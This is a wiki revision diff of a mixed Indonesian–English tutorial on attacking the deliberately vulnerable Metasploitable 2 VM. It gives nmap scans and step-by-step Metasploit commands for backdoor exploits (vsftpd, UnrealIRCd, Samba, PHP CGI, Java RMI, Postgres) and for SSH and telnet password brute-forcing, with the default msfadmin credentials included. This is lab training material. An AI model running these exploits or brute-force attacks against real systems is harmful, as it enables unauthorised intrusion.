Difference between revisions of "Metasploitable: pentest"
Onnowpurbo (talk | contribs) (→Cek IP) |
Onnowpurbo (talk | contribs) (→nmap) |
||
| Line 36: | Line 36: | ||
nmap -sS -v -O 192.168.122.134 | nmap -sS -v -O 192.168.122.134 | ||
| − | + | Dari hasil scan nmap kita akan bisa melihat port mana yang terbuka service mana yang berjalan di port mana. Kita dapat memulai serangan satu per satu di port yang vulneable. | |
| − | |||
| − | + | ==attack vsftpd== | |
| − | + | buka metasploit | |
| − | + | metasploit | |
| − | + | ketik | |
| − | + | search | |
| + | search vsftpd 2.3.4 | ||
| − | + | Typing the above command will show the exploits that will help you in attack the said version. So further type: | |
| − | + | use exploit/unix/ftp/vsftpd_234_backdoor | |
| + | set rhost 192.168.1.106 | ||
| + | set rport 21 | ||
| + | exploit | ||
| − | + | Once your attack is executed, you will reach in the shell of the metasploitable and so now you can do as you deserve. | |
| − | + | ==attack ssh== | |
| − | + | Now, we will exploit ssh which works on port number 22. There is already existing exploit for this port. It will help us to apply dictionary attack to crack the password of metasploitable and so we will use it as : | |
| − | set user_file /root/Desktop/user.txt | + | use auxiliary/scanner/ssh/ssh_login |
| − | + | set rhosts 192.168.1.106 | |
| − | set pass_file /root/Desktop/pass.txt | + | set rport 22 |
| − | + | set user_file /root/Desktop/user.txt | |
| − | exploit | + | set pass_file /root/Desktop/pass.txt |
| + | exploit | ||
As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username. | As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username. | ||
| − | + | ==Remote login dari kali linux== | |
| − | |||
| − | |||
| − | + | misalnya IP metasploitable 192.168.122.134 | |
| − | ssh | + | ssh msfadmin@192.168.122.134 |
| − | + | password | |
| − | + | msfadmin | |
| − | |||
| − | + | ==attack telnet== | |
| − | + | Jalankan metasploit | |
| − | + | metasploit | |
| − | + | Lakukan | |
| − | set user_file /root/Desktop/user.txt | + | use auxiliary/scanner/telnet/telnet_login |
| + | set rhosts 192.168.122.134 | ||
| + | set rport 23 | ||
| + | set user_file /root/Desktop/user.txt | ||
| + | set pass_file /root/Desktop/pass.txt | ||
| + | exploit | ||
| − | + | Sama dengan ssh, ini adalah dictionary attack. Setelah memperoleh password kita dapat masuk dari kali linux menggunakan | |
| − | + | telnet 192.168.122.134 | |
| − | + | ==attack web== | |
| − | |||
| − | |||
| − | |||
| − | |||
Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type: | Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type: | ||
| − | use exploit/multi/http/php_cgi_arg_injection | + | use exploit/multi/http/php_cgi_arg_injection |
| + | set rhost 192.168.122.134 | ||
| + | set rport 80 | ||
| + | exploit | ||
| − | + | After the execution you will enter a meterpreter session of metasploitable as shown. | |
| − | + | ==attack file sharing== | |
| − | |||
| − | |||
| − | |||
| − | |||
Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit: | Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit: | ||
| − | use exploit/multi/samba/usermap_script | + | use exploit/multi/samba/usermap_script |
| − | + | set rhost 192.168.122.134 | |
| − | set rhost 192.168. | + | set rport 139 |
| − | + | exploit | |
| − | set rport 139 | ||
| − | |||
| − | exploit | ||
The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit. | The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit. | ||
| Line 128: | Line 126: | ||
Now, we will use the following exploit: | Now, we will use the following exploit: | ||
| − | use exploit/multi/misc/java_rmi_server | + | use exploit/multi/misc/java_rmi_server |
| + | set rhost 192.168.122.134 | ||
| + | set rport 1899 | ||
| + | exploit | ||
| − | + | Again, after you hit enter button on your keyboard you will have a meterpreter session. | |
| − | |||
| − | |||
| − | + | ==attack postgres== | |
| − | |||
The next exploit is: | The next exploit is: | ||
| − | use exploit/linux/postgres/postgres_payload | + | use exploit/linux/postgres/postgres_payload |
| + | set rhost 192.168.1.106 | ||
| + | set rport 5432 | ||
| + | exploit | ||
| − | + | Once the command is executed you will enter the meterpreter session as shown above. | |
| − | |||
| − | |||
| − | |||
| − | + | ==attack ircd== | |
The exploit that use is related to unreal ircd and to search its exploit type : | The exploit that use is related to unreal ircd and to search its exploit type : | ||
| − | search Unreal ircd | + | search Unreal ircd |
And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one. | And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one. | ||
| Line 158: | Line 156: | ||
To the exploit type: | To the exploit type: | ||
| − | use exploit/unix/irc/unreal_ircd_3281_backdoor | + | use exploit/unix/irc/unreal_ircd_3281_backdoor |
| − | + | set rhost 192.168.122.134 | |
| − | set rhost 192.168. | + | set rport 6667 |
| − | + | exploit | |
| − | set rport 6667 | ||
| − | |||
| − | exploit | ||
And when you will hit enter you will obtain a shell session meaning you will enter the shell of the metasploitable. | And when you will hit enter you will obtain a shell session meaning you will enter the shell of the metasploitable. | ||
Revision as of 07:36, 1 December 2018
sumber: https://www.hackingarticles.in/penetration-testing-skills-practice-metasploitable-beginner-guide/
Metasploitable adalah versi rentan Linux Ubuntu yang secara sukarela dirancang untuk menguji tool keamanan dan mendemonstrasikan kerentanan umum berbasis mesin virtual yang membantu kita melakukan pelatihan keamanan, menguji alat keamanan, dan mempraktekkan teknik pengujian penetrasi umum. VM akan berjalan pada produk VMware terbaru dan teknologi visualisasi lainnya seperti VirtualBox. Anda dapat men-download metasploitable dari
- https://www.vulnhub.com/entry/metasploitable-2,29/
- https://information.rapid7.com/download-metasploitable-2017.html
Metasploitable adalah framework yang dapat dieksploitasi yang membantu kita untuk meningkatkan keterampilan kita dan juga membantu penggunaan untuk menggunakan setiap port untuk keuntungan kita karena kita semua tahu bahwa port dan protokol adalah dasar dari peretasan sehingga, oleh karena itu, semakin banyak anda dapat mengambil manfaat dari korban.
Dalam hal ini kita akan menelusuri seluruh konsep metasploitable termasuk cara menginstalnya dan cara meretasnya selangkah demi selangkah. Kami akan mengambil semua port satu per satu yang rentan dan mencoba untuk mengeksploitasinya.
Download & Install
Pertama-tama Anda harus mengunduh metasploit dari tautan di atas. Setelah pengunduhan selesai, buka VirtualBox dan klik open mesin virtual.
Setelah mengklik OK, metasploitable akan terbuka di mesin virtual dan menjalankannya cukup klik pada Power pada mesin virtual ini dan itu akan menjalankan metasploitable anda.
Saat start, akan ditanya username password, masukan
username msfadmin password msfadmin
Cek IP
Cek IP address menggunakan
ifconfig
nmap
Scan sederhan dapat menggunakan nmap
nmap -sV 192.168.122.134 nmap -sS -v -O 192.168.122.134
Dari hasil scan nmap kita akan bisa melihat port mana yang terbuka service mana yang berjalan di port mana. Kita dapat memulai serangan satu per satu di port yang vulneable.
attack vsftpd
buka metasploit
metasploit
ketik
search search vsftpd 2.3.4
Typing the above command will show the exploits that will help you in attack the said version. So further type:
use exploit/unix/ftp/vsftpd_234_backdoor set rhost 192.168.1.106 set rport 21 exploit
Once your attack is executed, you will reach in the shell of the metasploitable and so now you can do as you deserve.
attack ssh
Now, we will exploit ssh which works on port number 22. There is already existing exploit for this port. It will help us to apply dictionary attack to crack the password of metasploitable and so we will use it as :
use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.1.106 set rport 22 set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username.
Remote login dari kali linux
misalnya IP metasploitable 192.168.122.134
ssh msfadmin@192.168.122.134
password
msfadmin
attack telnet
Jalankan metasploit
metasploit
Lakukan
use auxiliary/scanner/telnet/telnet_login set rhosts 192.168.122.134 set rport 23 set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
Sama dengan ssh, ini adalah dictionary attack. Setelah memperoleh password kita dapat masuk dari kali linux menggunakan
telnet 192.168.122.134
attack web
Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type:
use exploit/multi/http/php_cgi_arg_injection set rhost 192.168.122.134 set rport 80 exploit
After the execution you will enter a meterpreter session of metasploitable as shown.
attack file sharing
Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit:
use exploit/multi/samba/usermap_script set rhost 192.168.122.134 set rport 139 exploit
The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit.
Now, we will use the following exploit:
use exploit/multi/misc/java_rmi_server set rhost 192.168.122.134 set rport 1899 exploit
Again, after you hit enter button on your keyboard you will have a meterpreter session.
attack postgres
The next exploit is:
use exploit/linux/postgres/postgres_payload set rhost 192.168.1.106 set rport 5432 exploit
Once the command is executed you will enter the meterpreter session as shown above.
attack ircd
The exploit that use is related to unreal ircd and to search its exploit type :
search Unreal ircd
And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one.
To the exploit type:
use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost 192.168.122.134 set rport 6667 exploit
And when you will hit enter you will obtain a shell session meaning you will enter the shell of the metasploitable.
These are all the attacks that you can use against metasploitable and in the process you can learn how to attack a real life victim using different ports.